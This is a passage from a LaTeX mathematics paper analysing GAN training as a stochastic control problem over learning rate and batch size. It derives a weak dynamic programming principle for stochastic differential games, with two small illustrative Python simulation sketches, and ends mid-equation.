Let us consider the following expression for $n_{\max}$:
\begin{align*}
n_{\max} = (n^{w}_{\max},n^{\theta}_{\max}) = \big( c^w \times \bar{n}^w_{\max}, c^\theta \times \bar{n}^\theta_{\max}\big) = c \bullet \bar{n}_{\max},
\end{align*}
with $\bar{n}_{\max} = (\bar{n}^{w}_{\max},\bar{n}^{\theta}_{\max})$ a base time scale parameter initially fixed by the controller, and $c = (c^{w},c^{\theta})$ a constant adjustment around $\bar{n}_{\max}$. Under suitable conditions (see for example \citep{fatkullin2004computational, weinan2005analysis}), one can show that the asynchronous Algorithm \ref{Alg:async_update_rule_sde} converges to the limiting dynamics
\begin{equation}
\left\{
\begin{array}{l}
dw(t) = \cfrac{1}{c^w \epsilon^1} g_{w}(q(t)) dt , \\
d\theta(t) = - \cfrac{1}{c^\theta} g_{\theta}(q(t)) dt,
\end{array}
\right.
\label{Eq:pde1}
\end{equation}
where $q(t) = (w(t) , \theta(t))$ and $\epsilon^1$ is a small parameter measuring the separation between time scales. Thus, the SDE version of \eqref{Eq:pde1} is
\begin{equation*}
\hspace{-0.3cm}
\left\{
\begin{array}{l}
dw(t) = \tilde{\eta}^{w} g_{w}(q(t)) dt + \tilde{\eta}^{w} \sqrt{\bar{\eta}} \sigma_w(q(t)) dW^1(t), \\
\\
d\theta(t) = - \tilde{\eta}^{\theta} g_{\theta}(q(t)) dt + \tilde{\eta}^{\theta} \sqrt{\bar{\eta}} \sigma_\theta(q(t)) dW^2(t),
\end{array}
\right.
\end{equation*}
with $\tilde{\eta}^w = 1/(c^w \epsilon^1)$, and $\tilde{\eta}^\theta = 1/c^\theta$. Comparing the dynamics of $(w(t),\theta(t))_{t \geq 0}$ with that of Section \ref{sec:LRAnalysis} suggests that {\it the time scale and the learning rate control problems are equivalent.}
\subsection{Stochastic Control of Batch Size}
\manuallabel{sec:BatchSizeSelec}{3.3}
To understand the impact of the batch size, let us introduce a scaling factor $m^\theta \geq 1$, the terminal time $T$, a maximum number of iterations $t_{\max}$, and compare the two following algorithms:
\begin{equation*}
\hspace{-1.3cm}
\left\{
\begin{array}{ll}
w^1_{t+1} & = w^1_{t} + \eta g^{NM}_{w}(w^1_t,\theta^1_t), \\
\theta^1_{t+1} & = \theta^1_t - \eta g^{NM}_{\theta}(w^1_t,\theta^1_t),
\end{array}
\right.
\quad \forall t \leq t_{\max},
\end{equation*}
and
\begin{equation*}
\left\{
\begin{array}{ll}
w^2_{t+1} & = w^2_{t} + \eta g^{m^\theta (NM)}_{w}(w^2_t,\theta^2_t), \\
\theta^2_{t+1} & = \theta^2_t - \eta g^{m^\theta (NM)}_{\theta}(w^2_t,\theta^2_t),
\end{array}
\right.
\quad \forall t \leq t_{\max}/m^\theta.
\end{equation*}
Note that the second algorithm is run for fewer iterations so that the computational costs of the two methods are the same, i.e., both use the same number of per-sample gradient evaluations. Following \citep{cao2020approximation}, the continuous-time approximations of both algorithms can be written as
\begin{equation*}
\hspace{-0.7cm}
\left\{
\begin{array}{l}
dw^{1}(t) = g_{w}(q^1(t)) dt + \sqrt{\eta} \sigma_w(q^1(t)) dW^1(t), \\
\\
d\theta^1(t) = - g_{\theta}(q^1(t)) dt + \sqrt{\eta} \sigma_\theta(q^1(t)) dW^2(t),
\end{array}
\right.
\end{equation*}
and
\begin{equation*}
\left\{
\begin{array}{l}
dw^{2}(t) = g_{w}(q^2(t)) dt + \sqrt{\eta/m^\theta} \sigma_w(q^2(t)) dW^1(t), \\
\\
d\theta^2(t) = - g_{\theta}(q^2(t)) dt + \sqrt{\eta/m^\theta} \sigma_\theta(q^2(t)) dW^2(t),
\end{array}
\right.
\end{equation*}
with $q^1(t) = (w^1(t),\theta^1(t))$, $q^2(t) = (w^2(t),\theta^2(t))$, $g_w = \mathbb{E}[g_w^{NM}]$, $g_\theta = \mathbb{E}[g_\theta^{NM}]$, $\sigma_w^2$ (resp. $\sigma_\theta^2$) proportional to the variance of $g_w^{NM}$ (resp. $g_\theta^{NM}$), and $\eta \geq 0$ a constant learning rate. Note that, since samples are i.i.d., the variances of $g_w^{m^\theta NM}$ and $g_\theta^{m^\theta NM} $ are $m^\theta$ times smaller than $g_w^{NM}$ and $g_\theta^{NM} $ variances, i.e., $\mathsf{Var}(g_w^{NM}) = m^\theta \mathsf{Var}(g_w^{m^\theta NM})$, implying that enlarging the batch size reduces the variance.\\
Meanwhile, comparing the objective functions $\mathbb{E}[g(q^{1}(T))]$ and $\mathbb{E}[g(q^{2}(T/m^\theta))]$ of both implementations suggests that reducing the batch size leads to a longer time horizon, which means more parameter updates. Therefore, the question of finding the right trade-off between reducing the variance and performing more updates arises naturally.\\
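This trade-off can be probed on a toy problem. In the sketch below (illustrative only; a noisy quadratic with gradient noise scaling like $1/\sqrt{\text{batch size}}$ stands in for the GANs objective, and all constants are arbitrary), the two runs use the same total number of per-sample gradient evaluations: one performs $t_{\max}$ small-batch updates, the other $t_{\max}/m^\theta$ large-batch updates.

```python
import math
import random

random.seed(2)

def noisy_sgd(x0, eta, n_steps, batch_size, a=1.0, b=0.0):
    # Minimize f(x) = a/2 * x**2 + b * x with a noisy gradient whose standard
    # deviation scales like 1/sqrt(batch_size), as for an i.i.d. empirical mean.
    x = x0
    for _ in range(n_steps):
        grad = a * x + b + random.gauss(0.0, 1.0) / math.sqrt(batch_size)
        x = x - eta * grad
    return x

m_theta, t_max = 10, 1000
# Same gradient budget: many noisy updates vs. fewer, lower-variance updates.
x_small_batch = noisy_sgd(1.0, eta=0.05, n_steps=t_max, batch_size=1)
x_large_batch = noisy_sgd(1.0, eta=0.05, n_steps=t_max // m_theta,
                          batch_size=m_theta)
print(x_small_batch, x_large_batch)  # both end up near the minimizer x* = 0
```

Which variant wins depends on the noise level, the learning rate, and the horizon, which is precisely why the choice is posed as a control problem below.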
Now, one can select the optimal batch size in the same spirit as the learning rate control problem (see Section \ref{sec:LRAnalysis}). That is, consider
\begin{equation}
\tilde{v}^m(t,q) = \min_{m^\theta \in \mathcal{M}^{\theta}} \mathbb{E}\big[g\big(\tilde{q}^m(T)\big)\big|\tilde{q}^m(t) = q],
\label{Eq:ValFunctDef23}
\end{equation}
for any $(t,q) \in \mathbb{R}_+ \times \mathbb{R}^{M+N}$, where the process $\tilde{q}^m(t) = (\tilde{w}^m(t), \tilde{\theta}^m(t))$ represents the trained parameters at time $t$, and $\mathcal{M}^{\theta}$ is the set of admissible controls for $m^{\theta}$. The process $\tilde{q}^m$ satisfies the SDE below
\begin{equation}
\hspace{-0.3cm}
\left\{
\begin{array}{l}
d\tilde{w}^m(t) = \cfrac{g_{w}(\tilde{q}^m(t))}{m^\theta} dt + \cfrac{\sqrt{\eta} \sigma_w(\tilde{q}^m(t))}{m^\theta } d\tilde{W}^1(t), \\
\\
d\tilde{\theta}^m(t) = - \cfrac{ g_{\theta}(\tilde{q}^m(t))}{m^\theta } dt + \cfrac{\sqrt{\eta} \sigma_\theta(\tilde{q}^m(t))}{m^\theta } d\tilde{W}^2(t),
\end{array}
\right.
\label{Eq:sde23}
\end{equation}
with $\tilde{W}^1$ and $\tilde{W}^2$ two independent Brownian motions. The derivation of \eqref{Eq:sde23} is detailed in Appendix \ref{Appendix:proofOfSDE23}. Moreover, the set $\mathcal{M}^{\theta}$ is defined as
\begin{align*}
\mathcal{M}^{\theta} = \big\{ m :\;& m \text{ c\`{a}dl\`{a}g in } [1,m^{\max}] \text{ adapted to } \mathbb{F}^{(\tilde{W}^1,\tilde{W}^2)},\\
& \mathbb{E}[g\big( \tilde{q}^m(T) \big) \,|\,\tilde{q}^m(0)\,] < \infty
\big\}.
\end{align*}
We allow here $m^\theta$ to be a process in order to handle a more general control problem.
\section{Stochastic Differential Games}
\label{sec:St_Game_ctrl_pbm}
The minimax game of GANs with adaptive learning rate and batch size in the previous section can be analyzed in a more general framework of stochastic differential games. In this section, we first establish a weak form of dynamic programming principle (DPP) for a class of stochastic differential games where the underlying process is not necessarily a controlled Markov diffusion and where the value function is not a priori continuous. We will then apply this weak form of dynamic programming principle to stochastic games with controlled Markov diffusion, and show that the value of such games is the unique viscosity solution to the associated Isaac-Bellman equation, under suitable technical conditions.
\subsection{Formulation of Stochastic Differential Games}
\manuallabel{subsec:form_ctrl_pbm}{8.1}
Let $d \geq 1$ be a fixed integer and $(\Omega,\mathcal{F},\mathbb{P})$ be a probability space supporting a c\`{a}dl\`{a}g $\mathbb{R}^d$-valued process $Y$ with independent increments. Given $T \in \mathbb{R}_{+}^*$, we write $\mathbb{F} = \{\mathcal{F}_t,\,0 \leq t \leq T \}$ for the completion of the natural filtration of $Y$ on $[0,T]$. Here $\mathbb{F}$ satisfies the usual conditions (see for instance \citep{jacod2013limit}). We suppose that $\mathcal{F}_0$ is trivial and that $\mathcal{F}_T = \mathcal{F}$. Moreover, for every $t \geq 0$, set $\mathbb{F}^t = \{\mathcal{F}^t_s,\,s \geq 0 \}$, where $\mathcal{F}^t_s$ is the completion of $\sigma(Y_r - Y_t,\, t \leq r \leq s \vee t )$ by the null sets of $\mathcal{F}$.\\
The set $\mathcal{T}$ refers to the collection of all $\mathbb{F}$-stopping times. For any $(\tau_1,\,\tau_2) \in \mathcal{T}^2$ such that $\tau_1 \leq \tau_2$, the subset $\mathcal{T}_{[\tau_1,\tau_2]}$ is the collection of all $\tau \in \mathcal{T}$ verifying $\tau \in [\tau_1,\tau_2]\, a.s$. When $\tau_1 = 0$, we simply write $\mathcal{T}_{\tau_2} $. We use the notations $\mathcal{T}^{t}_{[\tau_1,\tau_2]}$ and $\mathcal{T}^t_{\tau_2} $ to denote the corresponding sets of $\mathbb{F}^t$-stopping times.\\
For every $ \tau \in \mathcal{T}$ and a subset $A$ of a finite-dimensional space, we denote by $L^0_\tau(A)$ the collection of all $\mathcal{F}_\tau$-measurable random variables with values in $A$. The set $\mathbb{H}^0(A)$ is the collection of all $\mathbb{F}$-progressively measurable processes with values in $A$, and $\mathbb{H}^0_{rcll}(A) $ is the subset of all processes in $\mathbb{H}^0(A)$ which are right continuous with finite left limits. We first introduce the sets
\begin{align*}
\mathbb{S} = [0,T] \times \mathbb{R}^d, \quad \mathcal{S}_0 = \{(\tau,\epsilon);\,\tau \in \mathcal{T}_T,\, \epsilon \in L^0_\tau(\mathbb{R}^d) \}.
\end{align*}
Then we take the two sets of control processes $\mathcal{U}_0^1 \subset \mathbb{H}^0(\mathbb{R}^{k^1})$ and $\mathcal{U}_0^2 \subset \mathbb{H}^0(\mathbb{R}^{k^2}) $, with $k^1 \geq 1$ and $k^2 \geq 1$ two integers, such that the controlled state process defined as the mapping
\begin{equation*}
(\tau,\epsilon;\nu^1,\nu^2) \in \mathcal{S} \times \mathcal{U}_0^1 \times \mathcal{U}_0^2 \longrightarrow X^{(\nu^1,\nu^2)}_{\tau,\epsilon},
\end{equation*}
is well defined and
\begin{equation*}
(\theta,X^{\nu}_{\tau,\epsilon}(\theta))\in \mathcal{S}, \qquad \forall(\tau,\epsilon)\in \mathcal{S},\forall \theta \in \mathcal{T}_{[\tau,T]}.
\end{equation*}
Here, $X^{(\nu^1,\nu^2)}_{\tau,\epsilon}$ refers to the controlled process and $\mathcal{S}$ is a set satisfying $\mathbb{S} \subset \mathcal{S} \subset \mathcal{S}_0$. For instance, one can take $\mathcal{S} = \{(\tau,\epsilon) \in \mathcal{S}_0;\,\mathbb{E}[|\epsilon|^2] < \infty \}$. In the sequel, we write $\mathcal{U}_0$ for the set $\mathcal{U}_0 = \mathcal{U}_0^1 \times \mathcal{U}_0^2$.\\
Let $f:\mathbb{R}^d \rightarrow \mathbb{R}$ be a Borel function, and the reward function $J$ be
\begin{equation}
J(t,x;\nu) = \mathbb{E}[f(X^{\nu}_{t,x}(T))], \qquad \forall (t,x)\in \mathbb{S},\forall \nu = (\nu^1,\nu^2) \in \mathcal{U}^1 \times \mathcal{U}^2,\label{Eq:reward_fct}
\end{equation}
with $\mathcal{U}^1$ (resp. $\mathcal{U}^2$) the set of admissible controls for $\nu^1$ (resp. $\nu^2$). Given $\nu^2$, we define $\mathcal{U}^{1}$ as
\begin{align*}
\mathcal{U}^{1} = \big\{ \nu^1 \in \mathcal{U}_0^1 ;\; & \mathbb{E}[|f(X^{(\nu^1,\nu^2)}_{t,x}(T))|] < \infty \big\}.
\end{align*}
Then, we denote by $\mathcal{U}^{2}$ the set
\begin{align*}
\mathcal{U}^{2} = \big\{ \nu^2 \in \mathcal{U}_0^2 :\; & \sup_{\nu^1 \in \mathcal{U}^{1}} \mathbb{E}[|f(X^{(\nu^1,\nu^2)}_{t,x}(T))|] < \infty \big\}.
\end{align*}
We write $\mathcal{U}^{1}_t$ (resp. $\mathcal{U}^{2}_t$) for the collection of processes $\nu^1 \in \mathcal{U}^{1}$ (resp. $\nu^2 \in \mathcal{U}^{2}$) that are $\mathbb{F}^t$-progressively measurable. We denote by $\mathcal{U}_t$ the set $\mathcal{U}_t = \mathcal{U}^{1}_t \times \mathcal{U}^{2}_t$. The value function $V$ of the stochastic control problem can be written as
\begin{equation*}
V(t,x) = \inf_{\nu^2 \in \mathcal{U}^{2}_t }\sup_{\nu^1 \in \mathcal{U}^{1}_t } J(t,x;\nu),\qquad \forall (t,x)\in \mathbb{S}.
\end{equation*}
\subsection{Dynamic Programming Principle for Stochastic Differential Games}
\manuallabel{subsec:dpp_ctrl_pbm}{8.2}
To establish the weak form of the dynamic programming principle, we work under the following mild assumptions, as in \citep{bouchard2011weak}.
\begin{Assumption} For all $(t,x) \in \mathbb{S}$, and $\nu \in \mathcal{U}_t$, the controlled state process satisfies
\begin{enumerate}[label= A.\arabic*, leftmargin=0.5cm]
\item \textbf{Independence.} The process $X^{\nu}_{t,x}$ is $\mathbb{F}^t$-progressively measurable.
\item \textbf{Causality.} For any $\tilde{\nu} \in \mathcal{U}_t$, $\tau \in \mathcal{T}^t_{[t,T]}$, and $ A \in \mathcal{F}^t_\tau $, if $\nu = \tilde{\nu} $ on $[t,\tau]$ and $\nu \mathbf{1}_A = \tilde{\nu} \mathbf{1}_A$ on $(\tau,T] $, then $X^{\nu}_{t,x} \mathbf{1}_A = X^{\tilde{\nu}}_{t,x} \mathbf{1}_A $.
\item \textbf{Stability under concatenation.} For every $\tilde{\nu} \in \mathcal{U}_t$, and $\theta \in \mathcal{T}^t_{[t,T]}$, we have
\begin{equation*}
\nu \mathbf{1}_{[0,\theta]} + \tilde{\nu} \mathbf{1}_{(\theta,T]} \in \mathcal{U}_t.
\end{equation*}
\item \textbf{Consistency with deterministic initial data.} For all $\theta \in \mathcal{T}^t_{[t,T]}$, we have the following:
\begin{enumerate}[label=\alph*.]
\item For $\mathbb{P}-$a.e. $\omega \in \Omega$, there exists $\tilde{\nu}_\omega \in \mathcal{U}_{\theta(\omega)}$ such that
\begin{equation*}
\mathbb{E}[f(X^{\nu}_{t,x}(T))|\mathcal{F}_\theta](\omega) = J(\theta(\omega),X^{\nu}_{t,x}(\theta)(\omega);\tilde{\nu}_\omega ).
\end{equation*}
\item For $t \leq s \leq T $, $\theta \in \mathcal{T}^t_{[t,s]}$, $\tilde{\nu} \in \mathcal{U}_s$, and $\bar{\nu}= \nu \mathbf{1}_{[0,\theta]} + \tilde{\nu} \mathbf{1}_{(\theta,T]}$, we have
\begin{equation*}
\mathbb{E}[f(X^{\bar{\nu}}_{t,x}(T))|\mathcal{F}_\theta](\omega) = J(\theta(\omega),X^{\nu}_{t,x}(\theta)(\omega);\tilde{\nu} ),\quad \text{for } \mathbb{P}-\text{a.e. } \omega \in \Omega.
\end{equation*}
\end{enumerate}
\end{enumerate}
\label{Assump:A}
\end{Assumption}
We also need the boundedness and regularity assumptions below.
\begin{Assumption} \label{Assump:B}
The value function $V$ is locally bounded.
\end{Assumption}
\begin{Assumption}\label{Assump:C}
The reward function $J(.;\nu)$ is continuous for every $\nu \in \mathcal{U}_0$.
\end{Assumption}
We are now ready to derive the weak form of dynamic programming principle.
\begin{theo} Suppose that Assumptions \ref{Assump:A}, \ref{Assump:B}, and \ref{Assump:C} hold, and let $(t,x) \in \mathbb{S}$ and $\{\theta^\nu,\, \nu \in \mathcal{U}_t\} \subset \mathcal{T}^t_{[t,T]}$ be a family of stopping times. Then
\begin{itemize}
\item For any upper-semicontinuous function $\phi$ such that $V \geq \phi$, we have
\begin{equation}
V(t,x) \geq \inf_{\nu^2 \in \mathcal{U}^2_t}\sup_{\nu^1 \in \mathcal{U}^1_t} \mathbb{E}[\phi(\theta^\nu,X^\nu_{t,x}(\theta^\nu))].\label{Eq:Theo_DPP1_1}
\end{equation}
\item For any lower-semicontinuous function $\phi$ such that $V \leq \phi$, we have
\begin{equation}
V(t,x) \leq \inf_{\nu^2 \in \mathcal{U}^2_t} \sup_{\nu^1 \in \mathcal{U}^1_t} \mathbb{E}[ \phi(\theta^{\nu},X^\nu_{t,x}(\theta^\nu))]. \label{Eq:Theo_DPP1_2}
\end{equation}
\end{itemize}
\label{Theo:DPP1}
\end{theo}
\begin{proof}[Proof of Theorem \ref{Theo:DPP1}]
Let us first prove \eqref{Eq:Theo_DPP1_1}. For any admissible process $\nu^2 \in \mathcal{U}^2_t$, define $\bar{V}$ as
\begin{equation}
\bar{V}(t,x;\nu^2) = \sup_{\nu^1 \in \mathcal{U}^1_t} J(t,x;(\nu^1,\nu^2)), \qquad \forall (t,x) \in \mathbb{S}.
\label{Eq:theo_1_eq0}
\end{equation}
Under Assumptions \ref{Assump:A}, \ref{Assump:B}, and \ref{Assump:C}, one can apply \cite[Theorem 3.5]{bouchard2011weak} to get
\begin{align*}
\bar{V}(t,x;\nu^{2}) \geq \sup_{\nu^1 \in \mathcal{U}^1_t}\,\mathbb{E}[\phi(\theta^\nu,X^{\nu}_{t,x}(\theta^\nu)) ].
\numberthis \label{Eq:theo_1_eq1}
\end{align*}
Since, $V(t,x) = \inf_{\nu^2 \in \mathcal{U}^2_t}\,\bar{V}(t,x;\nu^{2})$ by definition, we use \eqref{Eq:theo_1_eq1} to deduce that
\begin{align*}
V(t,x) \geq \inf_{\nu^2 \in \mathcal{U}^2_t} \sup_{\nu^1 \in \mathcal{U}^1_t}\,\mathbb{E}[\phi(\theta^\nu,X^{\nu}_{t,x}(\theta^\nu)) ].
\end{align*}
We now move to the proof of \eqref{Eq:Theo_DPP1_2}. Fix $\nu = (\nu^1,\nu^2) \in \mathcal{U}_t$ and set $\theta \in \mathcal{T}^t_{[t,T]}$. For any $t \geq 0$, we write $\bar{t}$ for the time $\bar{t} = t \wedge \theta(\omega)$. Let $\epsilon > 0$ and $\bar{V}$ be the function introduced in \eqref{Eq:theo_1_eq0}. Then, there is a family $(\nu^{(s,y),\epsilon,2})_{(s,y)\in \mathbb{S}} \subset \mathcal{U}_0 $ such that
\begin{equation}
\nu^{(s,y),\epsilon,2} \in \mathcal{U}^2_{s}, \qquad J(s,y;(\nu^{s,1},\nu^{(s,y),\epsilon,2})) - \epsilon \leq \bar{V}(s,y;\nu^{(s,y),\epsilon,2}) - \epsilon \leq V(s,y), \label{Eq:theo_1_eq2}
\end{equation}
for any $(s,y) \in \mathbb{S}$ and $\nu^{s,1} \in \mathcal{U}^1_{s}$. Let $\nu^{(s,y),\epsilon} = (\nu^{1},\nu^{(s,y),\epsilon,2}) \in \mathcal{U}_{s}$. Since $\phi$ is lower-semicontinuous, and $J$ is upper-semicontinuous, there exists a family $(r_{(s,y)})_{(s,y) \in \mathbb{S}}$ of positive scalars such that
\begin{align}
\phi(s,y) - \phi(s',y') \leq \epsilon, \qquad J(s,y;\nu^{(s,y),\epsilon}) - J(s',y';\nu^{(s,y),\epsilon}) \geq -\epsilon, \quad \forall (s',y') \in B(s,y;r_{(s,y)}), \label{Eq:theo_1_eq3}
\end{align}
with $(s,y) \in \mathbb{S}$ and
\begin{equation*}
B(s,y;r) = \{(s',y')\in \mathbb{S}; \, s' \in (s-r,s],\, \|y-y'\| < r \}, \qquad \forall r > 0.
\end{equation*}
Following the same approach as in \cite[Theorem 3.5, \emph{step} $2$]{bouchard2011weak}, we construct a countable sequence $(t_i,y_i,r_i)_{i \geq 1}$ of elements of $\mathbb{S} \times \mathbb{R}_+$, with $0 < r_i \leq r_{(t_i,y_i)}$ for all $ i \geq 1$, such that $\mathbb{S} \subset \{T\}\times \mathbb{R}^d \cup \{\cup_{i \geq 1} B(t_i,y_i;r_i)\} $. Set $A_0 = \{T\} \times \mathbb{R}^d$, $C_{-1} = \emptyset$, and define the sequence
$$
A_{i+1} = B(t_{i+1},y_{i+1};r_{i+1})\setminus C_i, \qquad C_i = C_{i-1} \cup A_i, \quad \forall i \geq 0.
$$
With this construction, it follows from \eqref{Eq:theo_1_eq2}, \eqref{Eq:theo_1_eq3}, and the fact that $V \leq \phi$, that the countable family $(A_i)_{i \geq 0}$ satisfies
\begin{align*}
\left\{
\begin{array}{ll}
\big( \theta, X^{\nu}_{t,x} ( \theta ) \big) \in \big(\cup_{i \geq 0} A_i\big)\,\, \mathbb{P}\text{-a.s.}, & A_i \cap A_j = \emptyset, \quad \text{ for } i \ne j, \\
J(.;\nu^{i,\epsilon}) \leq \phi + 3\epsilon, & \text{ on } A_i, \text{ for } i \geq 1,
\end{array}
\right.
\numberthis \label{Eq:theo_1_eq5}
\end{align*}
with $\nu^{i,\epsilon} = \nu^{(t_i,y_i),\epsilon}$ for any $i \geq 1$. We are now ready to prove \eqref{Eq:Theo_DPP1_2}. To this end,
set $A^n = \cup_{0 \leq i \leq n} A_i$ for any $n \geq 1$ and define
\begin{equation*}
\nu^{\epsilon,n,2}_s = \mathbf{1}_{[t,\theta]}(s) \nu^2_s + \mathbf{1}_{(\theta,T]}(s) \big( \nu^2_s \mathbf{1}_{(A^n)^c}\big(\theta,X^\nu_{t,x}(\theta)\big) + \sum_{i=1}^n \mathbf{1}_{A_i}\big(\theta,X^\nu_{t,x}(\theta)\big) \nu^{i,\epsilon,2}_s \big), \quad \forall s \in [t,T],
\end{equation*}
and $\bar{\nu}^{\epsilon,n} = (\nu^1, \nu^{\epsilon,n,2})$. Note that $\{ (\theta,X^{\nu}_{t,x}(\theta)) \in A_i\} \in \mathcal{F}^t_\theta$ as a consequence of Assumption \ref{Assump:A}.1. Then, it follows from Assumption \ref{Assump:A}.3 that $\bar{\nu}^{\epsilon,n}\in \mathcal{U}_t$.
Moreover, by definition of $B(t_i,y_i;r_i)$, we have $ \theta = \bar{t}_i \leq t_i $ on $\{ (\theta,X^{\nu}_{t,x}(\theta)) \in A_i\}$. Then, using Assumptions \ref{Assump:A}.4, \ref{Assump:A}.2, and \eqref{Eq:theo_1_eq5}, we deduce
\begin{align*}
&\mathbb{E}[f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big)|\mathcal{F}_\theta ]\mathbf{1}_{A^n}\big(\theta,X^\nu_{t,x}(\theta)\big) \\
= & \mathbb{E}[ f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big)|\mathcal{F}_\theta ] \mathbf{1}_{A_0} \big(\theta,X^\nu_{t,x}(\theta)\big) + \sum_{i=1}^n \mathbb{E}[ f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big)|\mathcal{F}_{\bar{t}_i} ] \mathbf{1}_{A_i} \big(\theta,X^\nu_{t,x}(\theta)\big) \\
=& V\big(T,X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) \mathbf{1}_{A_0} \big(\theta,X^\nu_{t,x}(\theta)\big) + \sum_{i=1}^n J(\bar{t}_i ,X^{\nu}_{t,x}(\bar{t}_i); \nu^{i,\epsilon}) \mathbf{1}_{A_i} \big(\theta,X^\nu_{t,x}(\theta)\big) \\
\leq &\sum_{i=0}^n \big( \phi(\theta,X^\nu_{t,x}(\theta)) + 3\epsilon \big) \mathbf{1}_{A_i} \big(\theta,X^\nu_{t,x}(\theta)\big) = \big( \phi(\theta,X^\nu_{t,x}(\theta)) + 3\epsilon \big) \mathbf{1}_{A^n} \big(\theta,X^\nu_{t,x}(\theta)\big).
\end{align*}
Using the tower property of conditional expectations, we get
\begin{align*}
\mathbb{E}\big[ f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) \big] & = \mathbb{E}\big[\mathbb{E}[ f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) | \mathcal{F}_{\theta}] \big]\\
& \leq \mathbb{E}\big[\big( \phi(\theta,X^\nu_{t,x}(\theta)) + 3\epsilon \big) \mathbf{1}_{A^n} \big(\theta,X^\nu_{t,x}(\theta)\big)\big] + \mathbb{E}\big[f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big)\mathbf{1}_{(A^n)^c} \big(\theta,X^\nu_{t,x}(\theta)\big)\big].
\end{align*}
Since $f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) \in \mathbb{L}^1$, it follows from the dominated convergence theorem that
\begin{align*}
& \mathbb{E}\big[ f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) \big] \\
\leq & 3\epsilon + \underset{n \rightarrow \infty}{\lim \inf}\,\mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta)) \mathbf{1}_{A^n} \big(\theta,X^\nu_{t,x}(\theta)\big)\big]\\
= & 3\epsilon + \underset{n \rightarrow \infty}{\lim}\,\mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))^+ \mathbf{1}_{A^n} \big(\theta,X^\nu_{t,x}(\theta)\big)\big] - \underset{n \rightarrow \infty}{\lim}\,\mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))^- \mathbf{1}_{A^n} \big(\theta,X^\nu_{t,x}(\theta)\big)\big]\\
= & 3\epsilon + \mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))\big], \numberthis \label{Eq:theo_1_eq6}
\end{align*}
where the last equality follows from the left-hand side of \eqref{Eq:theo_1_eq5} and from the monotone convergence theorem, since either $\mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))^+ \big] < \infty $ or $ \mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))^-\big] < \infty$. Finally, by the definition of $V$, the definition of $\bar{V}$, the arbitrariness of $\nu^1$, and \eqref{Eq:theo_1_eq6}, we deduce
\begin{align*}
V(t,x) \leq \bar{V}(t,x; \nu^{\epsilon,n,2}) & = \sup_{\nu^1 \in \mathcal{U}^1_t} \mathbb{E}\big[f\big(X^{\bar{\nu}^{\epsilon,n}}_{t,x}(T)\big) \big] \leq 3 \epsilon + \sup_{\nu^1 \in \mathcal{U}^1_t} \mathbb{E}\big[\phi(\theta,X^\nu_{t,x}(\theta))\big],
\end{align*}
which completes the proof of \eqref{Eq:Theo_DPP1_2} by the arbitrariness of $\nu^2 \in \mathcal{U}^2_t$ and $\epsilon > 0$.
\end{proof}
\subsection{Stochastic Differential Games under Controlled Markov Diffusions}
\manuallabel{subsec:mkv_diff_ctrl_pbm}{5.5}
We now consider a particular class of controlled Markov dynamics where, for any control process $\nu \in \mathcal{U}_0$,
\begin{align*}
d X^\nu_t = b(t,X^\nu_t,\nu_t) dt + \tilde{\sigma}(t,X^\nu_t,\nu_t) d W_t, \numberthis \label{Eq:dynamics_x_u}
\end{align*}
with $W$ a $d$-dimensional Brownian motion, $b: \mathbb{R}_+ \times \mathbb{R}^d \times \mathbb{R}^{k^1} \times \mathbb{R}^{k^2} \rightarrow \mathbb{R}^d$ and $\tilde{\sigma}: \mathbb{R}_+ \times \mathbb{R}^d \times \mathbb{R}^{k^1} \times \mathbb{R}^{k^2} \rightarrow \mathcal{M}_{\mathbb{R}}(d)$ two continuous functions, and $\mathcal{M}_{\mathbb{R}}(d)$ the space of $d\times d$ matrices with real coefficients. Here we assume that $b$ and $\tilde{\sigma}$ satisfy the usual Lipschitz continuity conditions to ensure that Equation \eqref{Eq:dynamics_x_u} admits a unique strong solution $X^\nu_{t_0,x_0} $ such that $X^\nu_{t_0,x_0}(t_0) = x_0$ with $(t_0,x_0)\in \mathbb{S}$.
Moreover, the function $f:\mathbb{R}^d \rightarrow \mathbb{R}$ associated with the reward function $J$ in \eqref{Eq:reward_fct} is continuous, and there exists a constant $K$ such that
$$
|f(x)| \leq K \big(1 + \|x\|^2 \big), \qquad \forall x \in \mathbb{R}^d.
$$
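Although not needed for the formal development, the controlled dynamics \eqref{Eq:dynamics_x_u} are straightforward to simulate with a standard Euler--Maruyama scheme. The sketch below uses illustrative toy coefficients (a control-scaled mean-reverting drift and a constant diagonal volatility), not any specific model from this paper:

```python
import numpy as np

def simulate_controlled_sde(b, sigma, control, x0, t0, T, n_steps, seed=0):
    """Euler-Maruyama scheme for dX_t = b(t, X_t, u_t) dt + sigma(t, X_t, u_t) dW_t."""
    rng = np.random.default_rng(seed)
    dt = (T - t0) / n_steps
    x = np.asarray(x0, dtype=float)
    path = [x.copy()]
    t = t0
    for _ in range(n_steps):
        u = control(t, x)                          # feedback control nu_t = u(t, X_t)
        dw = rng.normal(scale=np.sqrt(dt), size=x.size)
        x = x + b(t, x, u) * dt + sigma(t, x, u) @ dw
        t += dt
        path.append(x.copy())
    return np.array(path)

# Toy coefficients: the control scales a mean-reverting drift; constant diagonal volatility.
drift = lambda t, x, u: -u * x
vol = lambda t, x, u: 0.1 * np.eye(x.size)
path = simulate_controlled_sde(drift, vol, control=lambda t, x: 1.0,
                               x0=[1.0, -1.0], t0=0.0, T=1.0, n_steps=100)
```

Such sample paths are what a discrete-time approximation of the value function would average over.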
Then we can characterize the value of the game after defining the operator $H$ as follows:
\begin{equation*}
